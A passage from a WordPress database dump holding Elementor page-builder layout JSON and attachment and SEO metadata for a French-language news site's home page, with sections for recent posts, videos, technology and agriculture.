"y4m8rgg\",\"elType\":\"widget\",\"settings\":{\"section_magzma_main_news_1_general_control\":\"\",\"posts_per_page\":\"1\",\"category\":[\"4\"],\"section_magzma_main_news_post_control\":\"\",\"vertical_position\":{\"unit\":\"%\",\"size\":\"45\"},\"vertical_position_tablet\":{\"unit\":\"%\",\"size\":50},\"vertical_position_mobile\":{\"unit\":\"%\",\"size\":50},\"horizontal_position_tablet\":{\"unit\":\"%\",\"size\":5},\"horizontal_position_mobile\":{\"unit\":\"%\",\"size\":5},\"width\":\"300\",\"height\":\"250\",\"category_bg_color\":\"#0099f4\",\"category_bg_hover_color\":\"#e5e100\",\"typhography_title_color\":\"#ffffff\",\"typhography_title_hover_color\":\"#dddddd\",\"title_line_height_tablet\":{\"unit\":\"em\",\"size\":1.3},\"title_line_height_mobile\":{\"unit\":\"em\",\"size\":1.3},\"title_font_size_tablet\":{\"unit\":\"px\",\"size\":22},\"title_font_size_mobile\":{\"unit\":\"px\",\"size\":22},\"title_font_weight_tablet\":\"400\",\"title_font_weight_mobile\":\"400\",\"date_font_size_tablet\":{\"unit\":\"px\",\"size\":14},\"date_font_size_mobile\":{\"unit\":\"px\",\"size\":14},\"date_font_weight_tablet\":\"400\",\"date_font_weight_mobile\":\"400\",\"read_font_size_tablet\":{\"unit\":\"px\",\"size\":16},\"read_font_size_mobile\":{\"unit\":\"px\",\"size\":16},\"read_font_weight_tablet\":\"400\",\"read_font_weight_mobile\":\"400\",\"post_icon_color1\":\"rgba(255,255,255,0.5)\",\"post_icon_color2\":\"rgba(255,255,255,0.5)\",\"post_icon_size\":{\"unit\":\"px\",\"size\":\"15\"},\"post_icon_size_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_size_mobile\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding\":{\"unit\":\"px\",\"size\":\"15\"},\"post_icon_padding_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_mobile\":{\"unit\":\"px\",\"size\":20},\"section_magzma_main_news_column_control\":\"\",\"margin_bottom_tablet\":\"0\",\"margin_bottom_mobile\":\"0\",\"horizontal_col_select_tablet\":\"column-1\",\"horizontal_col_select_mobile\":\"column-1\",\"padding_size_tablet\":{\"unit\":\"px\",\"size\":25},\"padding_size_mobile\":{\"unit\":\"px\",\"size\":25},\"section_magzma_main_news_animation_control\":\"\",\"_section_style\":\"\",\"_section_background\":\"\",\"_box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"_section_responsive\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\",\"offset\":\"1\"},\"elements\":[],\"widgetType\":\"magzma-main-news-1\"}],\"isInner\":true}],\"isInner\":true}],\"isInner\":false}],\"isInner\":false},{\"id\":\"c10cdqk\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"cnfm4uk\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"ofz40wf\",\"elType\":\"widget\",\"settings\":{\"space\":{\"unit\":\"px\",\"size\":17}},\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"ghxiaw4\",\"elType\":\"section\",\"settings\":{\"structure\":\"20\"},\"elements\":[{\"id\":\"p0xcklh\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"tdxggq6\",\"elType\":\"widget\",\"settings\":{\"title\":\"R\\u00e9cent\",\"header_size\":\"h3\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Arial\",\"typography_line_height\":{\"unit\":\"em\",\"size\":2},\"_border_border\":\"double\",\"_border_width\":{\"unit\":\"px\",\"top\":\"2\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"lf137zu\",\"elType\":\"widget\",\"settings\":{\"posts_per_page\":\"6\",\"category_border_color\":\"#31c6b0\",\"title_font_size\":{\"unit\":\"px\",\"size\":12},\"use_excerpt\":\"\",\"button_bg_color\":\"#31c6b0\",\"animetime\":0},\"elements\":[],\"widgetType\":\"magzma-masonry-post-1\"}],\"isInner\":false},{\"id\":\"h33oed1\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"z1s2m91\",\"elType\":\"widget\",\"settings\":{\"title\":\"Videos \",\"header_size\":\"h3\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Arial\",\"typography_line_height\":{\"unit\":\"em\",\"size\":2},\"_border_border\":\"double\",\"_border_width\":{\"unit\":\"px\",\"top\":\"2\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"tb167uj\",\"elType\":\"widget\",\"settings\":{\"link\":\"https:\\/\\/www.youtube.com\\/watch?v=0jeXbexRihs\",\"vimeo_link\":\"https:\\/\\/vimeo.com\\/235215203\"},\"elements\":[],\"widgetType\":\"video\"},{\"id\":\"4pok7wn\",\"elType\":\"widget\",\"settings\":{\"link\":\"https:\\/\\/www.youtube.com\\/watch?v=c_ixEg9Gszk&feature=youtu.be\",\"vimeo_link\":\"https:\\/\\/vimeo.com\\/235215203\"},\"elements\":[],\"widgetType\":\"video\"},{\"id\":\"m45qqz3\",\"elType\":\"widget\",\"settings\":{\"link\":\"https:\\/\\/www.youtube.com\\/watch?v=wQaejvxoQ2o\",\"vimeo_link\":\"https:\\/\\/vimeo.com\\/235215203\"},\"elements\":[],\"widgetType\":\"video\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"dzzumio\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"q3q9ybg\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"tbcuyne\",\"elType\":\"widget\",\"settings\":{\"title\":\"Technologie\",\"header_size\":\"h3\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Arial\",\"typography_line_height\":{\"unit\":\"em\",\"size\":2},\"_border_border\":\"double\",\"_border_width\":{\"unit\":\"px\",\"top\":\"2\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"8sxkg8r\",\"elType\":\"section\",\"settings\":{\"structure\":\"22\"},\"elements\":[{\"id\":\"yxax9tw\",\"elType\":\"column\",\"settings\":{\"_column_size\":66,\"_inline_size\":60.524},\"elements\":[{\"id\":\"cetl99v\",\"elType\":\"widget\",\"settings\":{\"posts_per_page\":\"6\",\"category\":[\"3\"],\"title_font_size\":{\"unit\":\"px\",\"size\":12},\"use_date\":\"\",\"use_excerpt\":\"\",\"animate\":\"\",\"animetime\":0,\"category_border_color\":\"#4a00b4\",\"button_bg_color\":\"#4a00b4\"},\"elements\":[],\"widgetType\":\"magzma-masonry-post-1\"}],\"isInner\":false},{\"id\":\"583gbbd\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":39.475},\"elements\":[{\"id\":\"ed1i4kp\",\"elType\":\"widget\",\"settings\":{\"wp\":{\"title\":\"Suivez nous sur Twitter\",\"twitter_timeline_type\":\"username\",\"twitter_widget_username\":\"Gn_innovations\",\"twitter_widget_id\":\"\",\"twitter_widget_width\":\"\",\"twitter_widget_height\":\"300\",\"twitter_widget_tweet_limit\":\"2\",\"twitter_widget_theme\":\"light\",\"twitter_widget_link_color\":\"#3b94d9\",\"twitter_widget_border_color\":\"#f5f5f5\"}},\"elements\":[],\"widgetType\":\"wp-widget-do-etfw\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"0h88cw7\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"0d8cxde\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"gw32h4p\",\"elType\":\"widget\",\"settings\":{\"title\":\"Agriculture\",\"header_size\":\"h3\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Arial\",\"typography_line_height\":{\"unit\":\"em\",\"size\":2},\"_border_border\":\"double\",\"_border_width\":{\"unit\":\"px\",\"top\":\"2\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"8hg86ic\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"i9kn0sp\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"fxvmt3h\",\"elType\":\"widget\",\"settings\":{\"posts_per_page\":\"6\",\"category\":[\"2\"],\"excerpt_value\":10,\"category_border_color\":\"#23a455\",\"title_font_size\":{\"unit\":\"px\",\"size\":12},\"use_excerpt\":\"\"},\"elements\":[],\"widgetType\":\"magzma-masonry-post-1\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"bguffns\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"15hcw7d\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"ptqj2h6\",\"elType\":\"widget\",\"settings\":{\"title\":\"Autres\",\"header_size\":\"h3\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Arial\",\"typography_line_height\":{\"unit\":\"em\",\"size\":2},\"_border_border\":\"double\",\"_border_width\":{\"unit\":\"px\",\"top\":\"2\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"ub0yntr\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"tkvnvir\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[],\"isInner\":false}],\"isInner\":false}]'),(3107,928,'_elementor_version','0.4'),(3108,928,'_elementor_css','a:3:{s:4:\"time\";i:1511347861;s:5:\"fonts\";a:1:{i:0;s:5:\"Arial\";}s:6:\"status\";s:4:\"file\";}'),(3110,930,'_edit_last','1'),(3111,930,'_edit_lock','1511782491:1'),(3114,930,'_wp_desired_post_slug',''),(3115,933,'_wp_attached_file','2017/11/received_1606639512733963-1.jpeg'),(3116,933,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:2001;s:6:\"height\";i:1126;s:4:\"file\";s:40:\"2017/11/received_1606639512733963-1.jpeg\";s:5:\"sizes\";a:4:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:40:\"received_1606639512733963-1-150x150.jpeg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:40:\"received_1606639512733963-1-300x169.jpeg\";s:5:\"width\";i:300;s:6:\"height\";i:169;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:40:\"received_1606639512733963-1-768x432.jpeg\";s:5:\"width\";i:768;s:6:\"height\";i:432;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:41:\"received_1606639512733963-1-1024x576.jpeg\";s:5:\"width\";i:1024;s:6:\"height\";i:576;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(3117,930,'_thumbnail_id','933'),(3118,930,'_wp_page_template','default'),(3121,930,'_yoast_wpseo_content_score','30'),(3122,930,'_yoast_wpseo_primary_category','17'),(3123,930,'post_views_count','674'),(3124,935,'_elementor_edit_mode','builder'),(3125,935,'_elementor_data','[{\"id\":\"cgfdli8\",\"elType\":\"section\",\"settings\":{\"section_layout\":\"\",\"content_width\":{\"unit\":\"px\",\"size\":1170},\"gap\":\"no\",\"section_background\":\"\",\"background_overlay_section\":\"\",\"section_border\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_typo\":\"\",\"section_advanced\":\"\",\"margin\":{\"unit\":\"px\",\"top\":\"20\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":false},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"_section_responsive\":\"\",\"heading_visibility\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\"},\"elements\":[{\"id\":\"90zub0t\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null,\"section_style\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_background_overlay\":\"\",\"section_typo\":\"\",\"section_advanced\":\"\",\"section_responsive\":\"\",\"screen_xs\":\"default\",\"screen_xs_width\":\"100\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\",\"layout\":\"\"},\"elements\":[{\"id\":\"9wd6jr7\",\"elType\":\"section\",\"settings\":{\"section_layout\":\"\",\"layout\":\"full_width\",\"gap\":\"no\",\"structure\":\"30\",\"section_sticky_element\":\"\",\"section_background\":\"\",\"background_overlay_section\":\"\",\"section_border\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_typo\":\"\",\"section_advanced\":\"\",\"_section_responsive\":\"\",\"heading_visibility\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\"},\"elements\":[{\"id\":\"so55224\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":\"27.961\",\"section_style\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_background_overlay\":\"\",\"section_typo\":\"\",\"section_advanced\":\"\",\"section_responsive\":\"\",\"screen_xs\":\"default\",\"screen_xs_width\":\"100\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\",\"layout\":\"\"},\"elements\":[{\"id\":\"gvq9sbs\",\"elType\":\"widget\",\"settings\":{\"section_magzma_main_news_1_general_control\":\"\",\"posts_per_page\":\"1\",\"category\":[\"2\"],\"section_magzma_main_news_post_control\":\"\",\"vertical_position\":{\"unit\":\"%\",\"size\":\"45\"},\"vertical_position_tablet\":{\"unit\":\"%\",\"size\":41},\"vertical_position_mobile\":{\"unit\":\"%\",\"size\":50},\"horizontal_position_tablet\":{\"unit\":\"%\",\"size\":2},\"horizontal_position_mobile\":{\"unit\":\"%\",\"size\":5},\"width\":\"300\",\"height\":\"250\",\"category_bg_color\":\"#4caf50\",\"category_bg_hover_color\":\"#4caf50\",\"typhography_title_color\":\"#ffffff\",\"typhography_title_hover_color\":\"#dddddd\",\"title_line_height_tablet\":{\"unit\":\"em\",\"size\":1.3},\"title_line_height_mobile\":{\"unit\":\"em\",\"size\":1.3},\"title_font_size_tablet\":{\"unit\":\"px\",\"size\":18},\"title_font_size_mobile\":{\"unit\":\"px\",\"size\":22},\"title_font_weight_tablet\":\"400\",\"title_font_weight_mobile\":\"400\",\"date_font_size_tablet\":{\"unit\":\"px\",\"size\":14},\"date_font_size_mobile\":{\"unit\":\"px\",\"size\":14},\"date_font_weight_tablet\":\"400\",\"date_font_weight_mobile\":\"400\",\"read_font_size_tablet\":{\"unit\":\"px\",\"size\":16},\"read_font_size_mobile\":{\"unit\":\"px\",\"size\":16},\"read_font_weight_tablet\":\"400\",\"read_font_weight_mobile\":\"400\",\"post_icon_size_tablet\":{\"unit\":\"px\",\"size\":19},\"post_icon_size_mobile\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_tablet\":{\"unit\":\"px\",\"size\":16},\"post_icon_padding_mobile\":{\"unit\":\"px\",\"size\":20},\"section_magzma_main_news_column_control\":\"\",\"margin_bottom\":\"-10\",\"margin_bottom_tablet\":0,\"margin_bottom_mobile\":\"0\",\"horizontal_col_select_tablet\":\"column-1\",\"horizontal_col_select_mobile\":\"column-1\",\"padding_size_tablet\":{\"unit\":\"px\",\"size\":24},\"padding_size_mobile\":{\"unit\":\"px\",\"size\":25},\"section_magzma_main_news_animation_control\":\"\",\"_section_style\":\"\",\"_section_background\":\"\",\"_box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"_section_responsive\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\",\"offset\":\"0\",\"use_icon\":\"\"},\"elements\":[],\"widgetType\":\"magzma-main-news-1\"},{\"id\":\"dghaq27\",\"elType\":\"widget\",\"settings\":{\"section_magzma_main_news_1_general_control\":\"\",\"posts_per_page\":\"1\",\"category\":[\"1\"],\"section_magzma_main_news_post_control\":\"\",\"vertical_position\":{\"unit\":\"%\",\"size\":\"56\"},\"vertical_position_tablet\":{\"unit\":\"%\",\"size\":50},\"vertical_position_mobile\":{\"unit\":\"%\",\"size\":50},\"horizontal_position_tablet\":{\"unit\":\"%\",\"size\":5},\"horizontal_position_mobile\":{\"unit\":\"%\",\"size\":5},\"width\":\"300\",\"height\":\"250\",\"category_bg_color\":\"#fd0249\",\"category_bg_hover_color\":\"#266cc9\",\"typhography_title_color\":\"#ffffff\",\"typhography_title_hover_color\":\"#dddddd\",\"title_line_height_tablet\":{\"unit\":\"em\",\"size\":1.3},\"title_line_height_mobile\":{\"unit\":\"em\",\"size\":1.3},\"title_font_size_tablet\":{\"unit\":\"px\",\"size\":19},\"title_font_size_mobile\":{\"unit\":\"px\",\"size\":22},\"title_font_weight_tablet\":\"400\",\"title_font_weight_mobile\":\"400\",\"date_font_size_tablet\":{\"unit\":\"px\",\"size\":14},\"date_font_size_mobile\":{\"unit\":\"px\",\"size\":14},\"date_font_weight_tablet\":\"400\",\"date_font_weight_mobile\":\"400\",\"read_font_size_tablet\":{\"unit\":\"px\",\"size\":16},\"read_font_size_mobile\":{\"unit\":\"px\",\"size\":16},\"read_font_weight_tablet\":\"400\",\"read_font_weight_mobile\":\"400\",\"post_icon_size_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_size_mobile\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_mobile\":{\"unit\":\"px\",\"size\":20},\"section_magzma_main_news_column_control\":\"\",\"margin_bottom_tablet\":\"0\",\"margin_bottom_mobile\":\"0\",\"horizontal_col_select_tablet\":\"column-1\",\"horizontal_col_select_mobile\":\"column-1\",\"padding_size_tablet\":{\"unit\":\"px\",\"size\":25},\"padding_size_mobile\":{\"unit\":\"px\",\"size\":25},\"section_magzma_main_news_animation_control\":\"\",\"_section_style\":\"\",\"_section_background\":\"\",\"_box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"_section_responsive\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\",\"title_font_size\":{\"unit\":\"px\",\"size\":20}},\"elements\":[],\"widgetType\":\"magzma-main-news-1\"}],\"isInner\":true},{\"id\":\"6uc2i0p\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":\"44.078\",\"section_style\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_background_overlay\":\"\",\"section_typo\":\"\",\"section_advanced\":\"\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"10\",\"bottom\":\"0\",\"left\":\"10\",\"isLinked\":false},\"section_responsive\":\"\",\"screen_xs\":\"default\",\"screen_xs_width\":\"100\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\",\"layout\":\"\"},\"elements\":[{\"id\":\"fb4g874\",\"elType\":\"widget\",\"settings\":{\"section_magzma_main_news_1_general_control\":\"\",\"posts_per_page\":\"1\",\"category\":[\"4\"],\"section_magzma_main_news_post_control\":\"\",\"vertical_position\":{\"unit\":\"%\",\"size\":52},\"vertical_position_tablet\":{\"unit\":\"%\",\"size\":50},\"vertical_position_mobile\":{\"unit\":\"%\",\"size\":50},\"horizontal_position_tablet\":{\"unit\":\"%\",\"size\":5},\"horizontal_position_mobile\":{\"unit\":\"%\",\"size\":5},\"width\":\"400\",\"height\":\"350\",\"category_bg_color\":\"#4a00b4\",\"category_bg_hover_color\":\"#c9975f\",\"typhography_title_color\":\"#ffffff\",\"typhography_title_hover_color\":\"#dddddd\",\"title_line_height_tablet\":{\"unit\":\"em\",\"size\":1.3},\"title_line_height_mobile\":{\"unit\":\"em\",\"size\":1.3},\"title_font_size_tablet\":{\"unit\":\"px\",\"size\":22},\"title_font_size_mobile\":{\"unit\":\"px\",\"size\":22},\"title_font_weight_tablet\":\"400\",\"title_font_weight_mobile\":\"400\",\"date_font_size_tablet\":{\"unit\":\"px\",\"size\":14},\"date_font_size_mobile\":{\"unit\":\"px\",\"size\":14},\"date_font_weight_tablet\":\"400\",\"date_font_weight_mobile\":\"400\",\"read_font_size_tablet\":{\"unit\":\"px\",\"size\":16},\"read_font_size_mobile\":{\"unit\":\"px\",\"size\":16},\"read_font_weight_tablet\":\"400\",\"read_font_weight_mobile\":\"400\",\"post_icon_size_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_size_mobile\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_mobile\":{\"unit\":\"px\",\"size\":20},\"section_magzma_main_news_column_control\":\"\",\"margin_bottom_tablet\":\"0\",\"margin_bottom_mobile\":10,\"horizontal_col_select_tablet\":\"column-1\",\"horizontal_col_select_mobile\":\"column-1\",\"padding_size_tablet\":{\"unit\":\"px\",\"size\":25},\"padding_size_mobile\":{\"unit\":\"px\",\"size\":25},\"section_magzma_main_news_animation_control\":\"\",\"_section_style\":\"\",\"_section_background\":\"\",\"_box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"_section_responsive\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\",\"_margin_mobile\":{\"unit\":\"px\",\"top\":\"17\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"magzma-main-news-1\"},{\"id\":\"3k7dn06\",\"elType\":\"widget\",\"settings\":{\"section_magzma_main_news_1_general_control\":\"\",\"posts_per_page\":\"1\",\"category\":[\"6\"],\"section_magzma_main_news_post_control\":\"\",\"vertical_position\":{\"unit\":\"%\",\"size\":35},\"vertical_position_tablet\":{\"unit\":\"%\",\"size\":50},\"vertical_position_mobile\":{\"unit\":\"%\",\"size\":50},\"horizontal_position_tablet\":{\"unit\":\"%\",\"size\":5},\"horizontal_position_mobile\":{\"unit\":\"%\",\"size\":5},\"width\":\"400\",\"height\":\"140\",\"category_bg_color\":\"#e2db00\",\"category_bg_hover_color\":\"#c9975f\",\"typhography_title_color\":\"#ffffff\",\"typhography_title_hover_color\":\"#dddddd\",\"title_line_height_tablet\":{\"unit\":\"em\",\"size\":1.3},\"title_line_height_mobile\":{\"unit\":\"em\",\"size\":1.3},\"title_font_size_tablet\":{\"unit\":\"px\",\"size\":16},\"title_font_size_mobile\":{\"unit\":\"px\",\"size\":16},\"title_font_weight_tablet\":\"400\",\"title_font_weight_mobile\":\"400\",\"date_font_size_tablet\":{\"unit\":\"px\",\"size\":14},\"date_font_size_mobile\":{\"unit\":\"px\",\"size\":14},\"date_font_weight_tablet\":\"400\",\"date_font_weight_mobile\":\"400\",\"read_font_size_tablet\":{\"unit\":\"px\",\"size\":16},\"read_font_size_mobile\":{\"unit\":\"px\",\"size\":16},\"read_font_weight_tablet\":\"400\",\"read_font_weight_mobile\":\"400\",\"post_icon_size_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_size_mobile\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_mobile\":{\"unit\":\"px\",\"size\":20},\"section_magzma_main_news_column_control\":\"\",\"margin_bottom_tablet\":\"0\",\"margin_bottom_mobile\":10,\"horizontal_col_select_tablet\":\"column-1\",\"horizontal_col_select_mobile\":\"column-1\",\"padding_size_tablet\":{\"unit\":\"px\",\"size\":25},\"padding_size_mobile\":{\"unit\":\"px\",\"size\":25},\"section_magzma_main_news_animation_control\":\"\",\"_section_style\":\"\",\"_section_background\":\"\",\"_box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"_section_responsive\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\",\"_margin_mobile\":{\"unit\":\"px\",\"top\":\"17\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"offset\":\"0\",\"title_font_size\":{\"unit\":\"px\",\"size\":16},\"use_date\":\"\",\"use_read\":\"\"},\"elements\":[],\"widgetType\":\"magzma-main-news-1\"}],\"isInner\":true},{\"id\":\"48mal4x\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":\"27.960\",\"section_style\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_background_overlay\":\"\",\"section_typo\":\"\",\"section_advanced\":\"\",\"section_responsive\":\"\",\"screen_xs\":\"default\",\"screen_xs_width\":\"100\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\",\"layout\":\"\"},\"elements\":[{\"id\":\"x20xpc5\",\"elType\":\"widget\",\"settings\":{\"section_magzma_main_news_1_general_control\":\"\",\"posts_per_page\":\"1\",\"category\":[\"5\"],\"section_magzma_main_news_post_control\":\"\",\"vertical_position\":{\"unit\":\"%\",\"size\":\"45\"},\"vertical_position_tablet\":{\"unit\":\"%\",\"size\":50},\"vertical_position_mobile\":{\"unit\":\"%\",\"size\":50},\"horizontal_position_tablet\":{\"unit\":\"%\",\"size\":5},\"horizontal_position_mobile\":{\"unit\":\"%\",\"size\":5},\"width\":\"300\",\"height\":\"250\",\"category_bg_color\":\"#ff6600\",\"category_bg_hover_color\":\"#ea7441\",\"typhography_title_color\":\"#ffffff\",\"typhography_title_hover_color\":\"#dddddd\",\"title_line_height_tablet\":{\"unit\":\"em\",\"size\":1.3},\"title_line_height_mobile\":{\"unit\":\"em\",\"size\":1.3},\"title_font_size_tablet\":{\"unit\":\"px\",\"size\":22},\"title_font_size_mobile\":{\"unit\":\"px\",\"size\":22},\"title_font_weight_tablet\":\"400\",\"title_font_weight_mobile\":\"400\",\"date_font_size_tablet\":{\"unit\":\"px\",\"size\":14},\"date_font_size_mobile\":{\"unit\":\"px\",\"size\":14},\"date_font_weight_tablet\":\"400\",\"date_font_weight_mobile\":\"400\",\"read_font_size_tablet\":{\"unit\":\"px\",\"size\":16},\"read_font_size_mobile\":{\"unit\":\"px\",\"size\":16},\"read_font_weight_tablet\":\"400\",\"read_font_weight_mobile\":\"400\",\"post_icon_size_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_size_mobile\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_mobile\":{\"unit\":\"px\",\"size\":20},\"section_magzma_main_news_column_control\":\"\",\"margin_bottom\":\"-10\",\"margin_bottom_tablet\":\"0\",\"margin_bottom_mobile\":\"0\",\"horizontal_col_select_tablet\":\"column-1\",\"horizontal_col_select_mobile\":\"column-1\",\"padding_size_tablet\":{\"unit\":\"px\",\"size\":25},\"padding_size_mobile\":{\"unit\":\"px\",\"size\":25},\"section_magzma_main_news_animation_control\":\"\",\"_section_style\":\"\",\"_section_background\":\"\",\"_box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"_section_responsive\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\"},\"elements\":[],\"widgetType\":\"magzma-main-news-1\"},{\"id\":\"y4m8rgg\",\"elType\":\"widget\",\"settings\":{\"section_magzma_main_news_1_general_control\":\"\",\"posts_per_page\":\"1\",\"category\":[\"4\"],\"section_ma